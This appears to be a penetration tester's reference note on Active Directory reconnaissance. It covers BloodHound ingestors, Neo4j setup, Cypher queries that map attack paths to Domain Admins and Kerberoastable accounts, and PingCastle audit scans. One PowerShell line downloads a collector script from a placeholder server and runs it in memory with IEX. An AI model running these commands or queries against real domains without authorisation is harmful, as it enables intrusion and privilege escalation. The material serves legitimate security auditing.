Recon - AD scanners


BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. BloodHound can be used to easily identify highly complex attack paths that would otherwise be impossible to quickly identify.

The official installation procedure is available on the GitHub repository:

BloodHound ingestors


SharpHound is a C# data ingestor used by BloodHound to enumerate the Active Directory targeted domain. A PowerShell script SharpHound.ps1, in-lining the C# DLL, is available as well.

By default, SharpHound will output multiples JSON files in a compressed zip archive file that can directly be imported for graphical review and query in BloodHound.

Multiples collection methods are available:



Performs group membership collection, domain trust collection, local admin collection, and session collection


Performs group membership collection


Performs local admin collection


Performs local groups collection. No longer uses the NetLocalGroupGetMembers Windows API, rely instead on lower-levels API calls to the SAMRPC library to access the remote computer SAM


Performs Remote Desktop Users collection


Performs Distributed COM Users collection


Performs local admin collection using Group Policy Objects


Performs session collection


Performs local admin, RDP, DCOM and session collection


Performs privileged session collection (requires admin rights on target systems)


Performs domain trust enumeration


Performs collection of ACLs


Performs collection of Containers


Performs collection using LDAP only. Includes Group, Trusts, ACL, ObjectProps, Container, and GPOLocalGroup.


Performs all Collection Methods except GPOLocalGroup


# PowerShell SharpHound.ps1 collector.
# The SharpHound.ps1 PowerShell collector script in-lines the SharpHound C# DLL.
# Multiple ways can be used to import or directly inject into memory the SharpHound.ps1 script.
Import-Module SharpHound.ps1

IEX (New-Object Net.WebClient).DownloadString('http://<WEBSERVER_IP>:<WEBSERVER_PORT>/SharpHound.ps1');

(New-Object System.Net.WebClient).Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
IEX (New-Object Net.WebClient).DownloadString('');

Invoke-Bloodhound -Verbose -CollectionMethod <all | DcOnly | COLLECTION_METHOD>
Invoke-Bloodhound -Verbose -Domain '<DOMAIN_FQDN>' -DomainController '<DC_IP | DC_HOSTNAME>' -LDAPUsername '<USERNAME>' -LDAPPassword '<PASSWORD>' -CollectionMethod <all | DcOnly | COLLECTION_METHOD>

# C# SharpHound.exe collector.
SharpHound.exe -v -c <all | DcOnly | COLLECTION_METHOD>
SharpHound.exe -v --Domain '<DOMAIN_FQDN>' --domaincontroller '<DC_IP | DC_HOSTNAME>' --ldapusername '<USERNAME>' --ldappassword '<PASSWORD>' -c <all | DcOnly | COLLECTION_METHOD> is a Python based ingestor for BloodHound, based on the Impacket suite and only compatible with BloodHound 3.0, or newer versions. presents the main advantage of being usable on Linux systems and thus easily integrates with proxychains for pivoted Active Directory enumeration. supports most of SharpHound collect methods, specified above, except GPOLocalGroup and LocalGroup.

bloodhound-python -v -CollectionMethod  <all | DcOnly | <COLLECTION_METHOD>

# The specified domain controller must be a hostname. The -ns must be specified to a DNS server IP if the DC hostname is not resolved by the local system.
# --dns-tcp: The DNS queries will be made over TCP instead of UDP, useful to enumerate over SOCKS4 proxies which do not support the UDP protocol.
bloodhound-python -v --dns-tcp -dc <DC_HOSTNAME> -ns <DNS_SERVER_IP> -d <DOMAIN_FQDN> -u <USERNAME> [-p <PASSWORD> | --hashes ':<NTLM>'] -CollectionMethod  <all | DcOnly | <COLLECTION_METHOD>

Sysinternals's AdExplorer and

Active Directory domain snapshots taken with AdExplorer can be converted to JSON files supported by BloodHound using the Python script. AdExplorer can thus be used as an ingestor for BloodHound. Refer to the [ActiveDirectory] Recon - Domain Recon note for more information on AdExplorer.

A few limitations are however to be noted:

  • the snapshot only contains information on Active Directory objects (assimilable to a DcOnly collection made with SharpHound).

  • Organizational Units and Group Policy Objects information will be missing. [-o <OUTPUT_FOLDER>] <ADEXPLORER_SNAPSHOT>

The resulting JSON files can be imported normally through the BloodHound graphical interface.

Multiple Neo4j databases to handle different environments

The Neo4j Desktop application can be used to create and manage multiple databases. Due to Neo4j Community limitations, the usage of the thick client is required as having multiple databases is otherwise a feature of the Enterprise edition (as of 2022-01). Using multiple databases present the notable advantage of allowing oneself to work on different environments without requiring clears of the database and data reuploads.

The procedure to create multiple Neo4j databases through the Neo4j Desktop application is as follow:

  1. Create a new project: Projects (left menu) -> New.

  2. Adds a Local DBMS per environment, forest or domain (depending on the level of separation wished): Newly created project right panel -> (+) Add -> Local DBMS. The name specified for the DBMS can match the environment / forest / domain (for example), and the password should be identical between DBMS.

    Each Local DBMS will be composed of the default system and neo4j databases.

  3. Switch between DBMS (Mouse over the DBMS in the project right panel -> Start) and add data as needed through the BloodHound interface.

Once the different databases are populated, simply starting a DBMS through the Neo4j Desktop application allows to switch to a different environment in BloodHound (without having to login / logoff or restart BloodHound).

BloodHound GUI

The following commands can be used to start BloodHound. The default neo4j credentials are neo4j:neo4j and must be changed for the first login.

# Windows
net start neo4j

# Linux
# "neo4j start" may lead to errors if executed as non root account.
neo4j start
neo4j console


The zip archive files produced by SharpHound can simply be drag and dropped in the BloodHound graphical interface for treatment. The Upload button on the right may be used as well.

BloodHound / Neo4j Cypher queries

Neo4j Cyper 101

The Neo4j graph databases implements its own query language: Cypher. Raw Cypher queries can be made directly through the BloodHound GUI interface, in complement to the predefined BloodHound queries. Queries may also be executed through the Neo4j console (by default accessible using the Neo4j web interface at http://localhost:7474/browser/). The Neo4j console automatically display by default all the edges between nodes, which may be useful in some case but is more resources intensive.

Cypher is a "visual" language modeling a starting and ending nodes, linked by an edge. Queries are constructed using parenthesis, brackets, and arrow, with a very basic query looking like:


Cypher implements two basic clauses, MATCH and RETURN:

  • The MATCH clause specify the patterns Neo4j will search for in the database. MATCH is often coupled to a WHERE conditional statement that adds restrictions to the data retrieved.

  • The RETURN clause defines what to include in the query result set, which can be nodes, relationships, or nodes / relationships properties.

The relationship type and depth can be specified inside the brackets. For instance, the following link -[r:MemberOf]-> specify that the starting node should be a direct member of the group ending node, while the link -[r:MemberOf*1..]-> indicate that the MemberOf relationship may repeat any number of time and thus the starting node may be recursively a member of the group ending node.

Neo4j Cypher also implements the shortestPath and allShortestPaths functions that return, respectively, the shortest path and all the shortest paths (all paths with the same minimal amount of hops) from a starting node, or set of nodes, to an ending node, or set of nodes.

The following basic queries illustrate the use of the MATCH and RETURN clauses as well as the linking syntax:

# Returns all Nodes in the database

# Returns all domain in the database (and their relationships if executed through the Neo4j console)
# With relationships from BloodHound GUI
MATCH p=(n:Domain)-[r]-(m:Domain) RETURN p

# Returns all users in the database

# Returns all groups in the database

# Returns all computers in the database

# Returns all OU in the database

# Returns all GPO in the database

# Return the <OBJECT> (User, Group, Computer, OU or GPO) <NAME> (SAMACCOUNTNAME@DOMAIN_FQDN). Both queries are equivalent.
MATCH (n:<OBJECT> {name:"<NAME>"}) RETURN n

# Return the security principals directly member of the specified group <GROUP> (SAMACCOUNTNAME@DOMAIN_FQDN)
MATCH p=(n)-[b:MemberOf]->(c:Group {name: "<GROUP>"}) RETURN p

# Return all the security principals recursively member of the specified group <GROUP> (SAMACCOUNTNAME@DOMAIN_FQDN)
MATCH p=(n)-[b:MemberOf*1..]->(c:Group {name: "<GROUP>"}) RETURN p

# Return the names of the groups the specified user is a member of.
MATCH (u:User) WHERE =~ "<USERNAME_IN_CAPS>@<DOMAIN_FQDN_IN_CAPS>" MATCH p=(u)-[b:MemberOf*1..]->(g:Group) RETURN

# Return the path of the specified relationship type from any object to any objects
MATCH p=()-[r:<RELATIONSHIP>*1..]->() RETURN p

# Return shortest path from the Domain Users group to Domain Admins group
MATCH (g:Group) WHERE =~ 'DOMAIN USERS@.*' MATCH (g1:Group) WHERE =~ 'DOMAIN ADMINS@.*' OPTIONAL MATCH p=shortestPath((g)-[r:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin*1..]->(g1)) RETURN p

# Return all shortest paths from Domain Users to Domain Admins
MATCH (g:Group) WHERE =~ 'DOMAIN USERS@.*' MATCH (g1:Group) WHERE =~ 'DOMAIN ADMINS@.*' OPTIONAL MATCH p=allShortestPaths((g)-[r:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin*1..]->(g1)) RETURN p

The following operators are supported in the conditional WHERE statements:



Negate the subsequent condition


Is equal to


is different to


Is less than


Is less or equal


Greater than


Is greater or equal to


Is null


Is not null


String starts with


String ends with


String contains


String RegEx search

The relationship between nodes can be of the following types:

  • AddAllowedToAct

  • AddMember

  • AdminTo

  • AllExtendedRights

  • AllowedToAct

  • AllowedToDelegate

  • CanPSRemote

  • CanRDP

  • Contains

  • ExecuteDCOM

  • ForceChangePassword

  • GenericAll

  • GenericWrite

  • GetChanges

  • GetChangesAll

  • GPLink

  • HasSession

  • HasSIDHistory

  • Owns

  • MemberOf

  • ReadGMSAPassword

  • ReadLAPSPassword

  • SQLAdmin

  • TrustedBy

  • WriteDACL

  • WriteOwner

For more information about the Neo4j Cypher language, its use in BloodHound and BloodHound in general, the following resource may be consulted:,92,390

BloodHound built-in Cypher queries

BloodHound implements a number of Cypher queries, titled:

  • Find all Domain Admins

  • Find Shortest Paths to Domain Admins

  • Find Principals with DCSync Rights

  • Users with Foreign Domain Group Membership

  • Groups with Foreign Domain Group Membership

  • Map Domain Trusts

  • Shortest Paths to Unconstrained Delegation Systems

  • Shortest Paths from Kerberoastable Users

  • Shortest Paths to Domain Admins from Kerberoastable Users

  • Shortest Path from Owned Principals

  • Shortest Paths to Domain Admins from Owned Principals

  • Shortest Paths to High Value Targets

  • Find Computers where Domain Users are Local Admin

  • Find Computers where Domain Users can read LAPS passwords

  • Shortest Paths from Domain Users to High Value Targets

  • Find All Paths from Domain Users to High Value Targets

  • Find Workstations where Domain Users can RDP

  • Find Servers where Domain Users can RDP

  • Find Dangerous Rights for Domain Users Groups

  • Find Kerberoastable Members of High Value Groups

  • List all Kerberoastable Accounts

  • Find Kerberoastable Users with most privileges

  • Find Domain Admin Logons to non-Domain Controllers

  • Find Computers with Unsupported Operating Systems

  • Find AS-REP Roastable Users (DontReqPreAuth)

Custom Cypher queries

Most of the queries below are from, or inspired from, previous work made by @Haus3c.

The following queries were validated in the Neo4j console.

# Kerberoasting.
# Find all users with an SPN (kerberoastable users).
MATCH (n:User) WHERE n.hasspn=true RETURN n

# Find all users with an SPN (kerberoastable users) with passwords last set > 5 years ago.
MATCH (u:User) WHERE u.hasspn=true AND u.pwdlastset < (datetime().epochseconds - (1825 * 86400)) AND NOT u.pwdlastset IN [-1.0, 0.0] RETURN, u.pwdlastset order by u.pwdlastset

# Find SPNs all users with an SPN containing the specified keywords <KEYWORD>.
MATCH (u:User) WHERE ANY (x IN u.serviceprincipalnames WHERE toUpper(x) CONTAINS '<KEYWORD>')RETURN u

# AS_REP roasting.
# Find all users that do not require Kerberos pre-authentication SPN (AS_REP roastable users).
MATCH (n:User) WHERE n.dontreqpreauth=true RETURN n

# Computers using an unsupported operating system, with a logon in the last 6 months.
MATCH (c:Computer) WHERE c.operatingsystem =~ "(?i).*(2000|2003|2008|xp|vista|7|me).*" AND (c.lastlogontimestamp < (datetime().epochseconds - (6 * 30 * 86400)) OR c.lastlogon < (datetime().epochseconds - (6 * 30 * 86400))) RETURN,c.operatingsystem

# Sessions enumeration.
# Domains Admins and Enterprise Admins sessions opened on computers except Domain Controllers.
OPTIONAL MATCH (c:Computer)-[:MemberOf*1..]->(t:Group) WHERE NOT t.objectid ENDS WITH '-516' WITH c as NonDC MATCH p=(NonDC)-[:HasSession]->(n:User)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-512' OR g.objectid ENDS WITH '-519' RETURN DISTINCT ( as Username, COUNT(DISTINCT(NonDC)) as Connexions ORDER BY COUNT(DISTINCT(NonDC)) DESC
OPTIONAL MATCH (c:Computer)-[:MemberOf]->(t:Group) WHERE NOT = 'DOMAIN CONTROLLERS@TESTLAB.LOCAL' WITH c as NonDC MATCH p=(NonDC)-[:HasSession]->(n:User)-[:MemberOf*1..]->(g:Group {name:”DOMAIN ADMINS@TESTLAB.LOCAL”}) RETURN DISTINCT ( as Username, COUNT(DISTINCT(NonDC)) as Connexions ORDER BY COUNT(DISTINCT(NonDC)) DESC

# Remote execution privileges.
# Local Administrators.
# First degree membership of the specified domain user to the local Administrators groups of any computers in the BloodHound database (current domain and others integrated domains).
MATCH (u:User) WHERE =~ "<USERNAME_IN_CAPS>@<DOMAIN_FQDN_IN_CAPS>" MATCH (c:Computer) MATCH p=allShortestPaths((u)-[r:AdminTo]->(c)) RETURN
# Both first degree and group delegated membership of the specified domain user to the local Administrators groups of any computers in the BloodHound database (current domain and others integrated domains).
MATCH (u:User) WHERE =~ "<USERNAME_IN_CAPS>@<DOMAIN_FQDN_IN_CAPS>" MATCH (c:Computer) MATCH p=allShortestPaths((u)-[r:AdminTo|MemberOf*1..]->(c)) RETURN

# Membership of Everyone, Anonymous, Authenticated Users, Domain Users or Domain Computers to the local Administrators group of any computers in the BloodHound database (current domain and others integrated domains).
MATCH (g:Group) WHERE g.objectid ENDS WITH '-513' OR g.objectid ENDS WITH 'S-1-5-11' OR g.objectid ENDS WITH 'S-1-1-0' OR g.objectid ENDS WITH 'S-1-5-7' MATCH (c:Computer) MATCH p=allShortestPaths((g)-[r:AdminTo]->(c)) RETURN

# Possible code execution (local Administrators, Remote Desktop Users, Distributed COM users, LAPS password delegation, etc.).
# Possible code execution of the specified domain user to all computers integrated in the BloodHound database.
MATCH (u:User) WHERE =~ "<USERNAME_IN_CAPS>@<DOMAIN_FQDN_IN_CAPS>" MATCH (c:Computer) MATCH p=allShortestPaths((g)-[r:AdminTo|GenericAll|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|ReadLAPSPassword|SQLAdmin|CanPSRemote]->(c)) RETURN
# Possible code execution of Everyone, Anonymous, Authenticated Users, Domain Users or Domain Computers to all computers integrated in the BloodHound database.
MATCH (g:Group) WHERE g.objectid ENDS WITH '-513' OR g.objectid ENDS WITH 'S-1-5-11' OR g.objectid ENDS WITH 'S-1-1-0' OR g.objectid ENDS WITH 'S-1-5-7' MATCH (c:Computer) MATCH p=allShortestPaths((g)-[r:AdminTo|GenericAll|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|ReadLAPSPassword|SQLAdmin|CanPSRemote]->(c)) RETURN

# Kerberos delegations.
# Computers, except Domain Controllers, that are trusted to perform unconstrained delegation.
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH "-516" WITH COLLECT( AS domainControllers MATCH (c2:Computer {unconstraineddelegation:true}) WHERE NOT IN domainControllers RETURN,c2.operatingsystem ORDER BY ASC
# Users trusted that are trusted to perform unconstrained delegation.
MATCH (u:User {unconstraineddelegation:true}) RETURN,u.description,u.serviceprincipalnames,u.lastlogon,u.lastlogontimestamp

# Advanced control paths.
# Shortest path from Everyone, Anonymous, Authenticated Users, Domain Users or Domain Computers to Enterprise Admins, Domain Admins, KRBTGT, domain built-in Administrator, Domain Controllers,	Cert Publishers, Schema Admins, Key Admins, Enterprise Key Admins, Account Operators, Server Operators, Print Operators or Backup Operators.
MATCH (g:Group) WHERE g.objectid ENDS WITH '-513' OR g.objectid ENDS WITH '-515' OR g.objectid ENDS WITH 'S-1-5-11' OR g.objectid ENDS WITH 'S-1-1-0' OR g.objectid ENDS WITH 'S-1-5-7' MATCH (m:Group) WHERE m.objectid ENDS WITH 'S-1-5-9' OR m.objectid ENDS WITH '-500' OR m.objectid ENDS WITH '-502' OR m.objectid ENDS WITH '-512' OR m.objectid ENDS WITH '-516' OR m.objectid ENDS WITH '-517' OR m.objectid ENDS WITH '-518' OR m.objectid ENDS WITH '-519' OR m.objectid ENDS WITH '-526' OR m.objectid ENDS WITH '-527' OR m.objectid ENDS WITH '-548' OR m.objectid ENDS WITH '-549' OR m.objectid ENDS WITH '-550' OR m.objectid ENDS WITH '-551' MATCH p=allShortestPaths((g)-[r:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..]->(m)) RETURN p

# Direct and potentially involuntary control (direct link with out MemberOf) of Everyone, Anonymous, Authenticated Users, Domain Users or Domain Computers to any domain objects.
# Adding the "MemberOf" relationship type may greatly complexify the reading of the resulting graph.
MATCH (source_object:Group) WHERE source_object.objectid ENDS WITH '-513' OR source_object.objectid ENDS WITH '-515' OR source_object.objectid ENDS WITH 'S-1-5-11' OR source_object.objectid ENDS WITH 'S-1-1-0' OR source_object.objectid ENDS WITH 'S-1-5-7' MATCH p=(source_object)-[r:AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin*1..]->(vulnerable_object) RETURN p
# Table form for exporting the results from the neo4j's console
MATCH (source_object:Group) WHERE source_object.objectid ENDS WITH '-513' OR source_object.objectid ENDS WITH '-515' OR source_object.objectid ENDS WITH 'S-1-5-11' OR source_object.objectid ENDS WITH 'S-1-1-0' OR source_object.objectid ENDS WITH 'S-1-5-7' MATCH p=(source_object)-[r:AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin*1..]->(vulnerable_object) RETURN,,r

# Enumeration of GenericAll, WriteDacl and WriteOwner ACEs on all AD objects for all security principals except - ALL domains - privileged built-in groups and principals such as "Creator Owner" (SID: S-1-3-0) and Local System (SID: S-1-5-18).
MATCH (source_object) WHERE NOT source_object.objectid ENDS WITH "-512" AND NOT source_object.objectid ENDS WITH "-519" AND NOT source_object.objectid ENDS WITH "S-1-5-32-544" AND NOT source_object.objectid ENDS WITH "S-1-5-32-548" AND NOT source_object.objectid ENDS WITH "S-1-5-32-549" AND NOT source_object.objectid ENDS WITH "S-1-5-32-550" AND NOT source_object.objectid ENDS WITH "S-1-5-32-551" AND NOT source_object.objectid ENDS WITH "S-1-5-32-518" AND NOT source_object.objectid ENDS WITH "S-1-5-32-516" AND NOT source_object.objectid ENDS WITH "S-1-5-32-526" AND NOT source_object.objectid ENDS WITH "S-1-5-32-527" AND NOT source_object.objectid ENDS WITH "S-1-5-18" AND NOT source_object.objectid ENDS WITH "S-1-5-9" AND NOT source_object.objectid ENDS WITH "S-1-3-0" AND NOT source_object.objectid ENDS WITH "S-1-5-10" MATCH p=(source_object)-[r:GenericAll|Owns|WriteDacl|WriteOwner|ForceChangePassword]->(vulnerable_object) RETURN,,r

# More queries:

(Dirty) Manual analysis of SharpHound results

For larger Active Directory domains, specifics search on the SharpHound resulting JSON files may be used to more rapidly identify entry point, such as resources accessible to following groups:

  • Everyone, SID: S-1-1-0

  • Anonymous, SID: S-1-5-7

  • Authenticated Users, SID: S-1-5-11

  • Users, SID: S-1-5-32-545

  • Domain Users, SID: S-1-5-<DOMAIN>-513

  • Domain Computers, SID: S-1-5-<DOMAIN>-515

The following bash script can be used to convert the one-line JSON result of SharpHound to a more human readable format:

for filename in *.json; do
  echo $filename
  jq --color-output . $filename > $filename.jq
grep -A 10 -B 10 -rin "S-1-1-0\|S-1-5-7\|S-1-5-11\|S-1-5-32-545" *.jq

[Linux] BloodHound Owned

The bh-owned.rb ruby script can be used to automatically tag the provided users from a file as owned or blacklist.

ruby bh-owned.rb -u neo4j -p <NEO4J_DB_PASSWORD> -a <COMPROMISED_USERS_FILE>

Note that the usernames must correspond to the BloodHound expected node format: UPPERCASE_USERNAME@UPPERCASE_DOMAIN_FQDN.



touch ./tmp_file
cat $users_file | while read line; do
  echo $line"@"$users_fqdn >> ./tmp_file

awk '{print toupper($0)}' < ./tmp_file > formated_users_file.txt
rm -rf ./tmp_file

ruby bh-owned.rb -u neo4j -p <NEO4J_DB_PASSWORD> -a <COMPROMISED_USERS_FILE>


PingCastle is an C# application designed to run a number of security checks, targeting the most common Active Directory security issues. PingCastle generates an HTLM report summarizing the findings for the healthcheck mode or produces text files for the individual modules.

Note that the licensing model of PingCastle specify the following:

  • "Except if a license is purchased, you are not allowed to make any profit from this source code"

  • "It is allowed to run PingCastle without purchasing any license on for profit companies if the company itself (or its ITSM provider) run it"

So in order to legally make use of PingCastle, a license must be purchased by the auditor or the scans must be conducted by the audited company and the results communicated to the auditors.

The healthcheck mode runs more that fifty checks, including:

  • Enumeration of the members of the domain privileged groups (Enterprise Admins, Domain Admins, built-in Operators groups, etc.).

  • Creation of a limited Active Directory control path graph to privileged groups, similar in nature but not as complete to what can be accomplished using BloodHound. PingCastle's control path graphs are based on group memberships, GPO mapping and Access Control List (ACL) on privileged objects and can be visualized in the Control Paths Analysis section by clicking on the Analysis link of each privileged group.

  • Enumeration of the operating systems in use on the computers integrated to the Active Directory domain.

  • Enumeration of Active Directory privileges group memberships and users with the admincount bit set to 1 (accounts protected by the AdminSdHolder mechanism).

  • Verification of privileges security principals' and GPO's ACLs.

  • Search of GPP passwords and restricted groups definition in GPO.

  • Verification of the implementation of Local Administrator Password Solution (LAPS) and Windows Event Forwarding solutions.

  • Enumeration of privileged accounts that define a ServicePrincipalName (SPN) (and are thus prone to Kerberoasting attack).

  • Listing of user and machine accounts that can have an empty password as well as user accounts that do not require Kerberos pre-authentication (and are thus vulnerable to ASP-Roast attacks).

  • Enumeration of domain configured trusts.

  • Verification if the Exchange Windows Permissions security principal has the WriteDacl right in the root domain security descriptor

  • etc.

PingCastle can also be used to run a number of specific security scans through various modules:



Check authorization related to users or groups. Default to everyone, authenticated users and domain users.


Check for computers without known antivirus installed. It is used to detect unprotected computers but may also report computers with unknown antivirus.


Export all users of the AD with their creation date, last logon and last password change.



Check on the AD if LAPS and/or BitLocker has been enabled. Default check for all the computers in the domain.


Enumerate the local Administrators of the specified computer or all computers in the domain.


Check if null sessions are enabled.


Attempts to enumerate the Active Directory domain trusts through a null session.


Checks for the presence of a remote desktop solution (RDP, TeamViewer, VNC, etc.) on the targeted computer(s).


List all shares published on the specified computer or all computers in the domain and determine if the share can be accessed by anyone.


Scan the specified computer or all computers in the domain and determine the smb version available. Also check if SMB signing is enabled.


Check if the spooler service is remotely active on the specified computer or all computers in the domain.


Get the last startup date of the specified computer or all computers in the domain. Can be used to determine if latest patches have been applied.


Enumerates the Domain Controllers through AD requests and check for presence of the ZeroLogon vulnerability on all the enumerated Domain Controllers

In order to execute PingCastle on a computer with out the .NET framework 3.5 installed, the PingCastle.pdb and PingCastle.exe.config files must be present in the same directory as the PingCastle.exe binary.

PingCastle can be launched in interactive mode using the current user security context or with a specified account using the following commands. Before running the PingCastle's healthcheck mode, it is recommended to remove the limitation of 100 users in the generated HTML report: 5-advanced -> 4-noenumlimit.

# Runs PingCastle in interactive mode.

# Runs PingCastle's healthcheck mode with out the limitation of 100 users.
PingCastle.exe --no-enum-limit --healthcheck

# Runs the PingCastle's healthcheck on the specified domain using the provided credentials.
PingCastle.exe --server <DC_FQDN | DC_IP> --user "<DOMAIN>\<USERNAME>" --password "<PASSWORD>" --no-enum-limit --interactive

# Runs the PingCastle's healthcheck on all trusted domains.
# --explore-trust: on domains of a forest, runs the healthcheck on all trusted domains except domains of the forest and forest trusts.
# --explore-forest-trust: on the root domain of a forest, runs the healthcheck on all forest trusts discovered.
PingCastle.exe --explore-trust --explore-forest-trust --no-enum-limit --healthcheck

# Runs the specified scanner module.
PingCastle.exe --scanner "<MODULE_NAME>"
PingCastle.exe --server <DC_FQDN | DC_IP> --user "<DOMAIN>\<USERNAME>" --password "<PASSWORD>" --scanner "<MODULE_NAME>"

# Runs, as of PingCastle version, all the PingCastle available scanner modules.
$modules = @("aclcheck", "smb", "share", "localadmin", "spooler", "antivirus", "export_user", "foreignusers", "laps_bitlocker", "smb3querynetwork", "nullsession", "nullsession-trust", "oxidbindings")

foreach ($module in $modules) {
   .\PingCastle.exe --scanner "$module"


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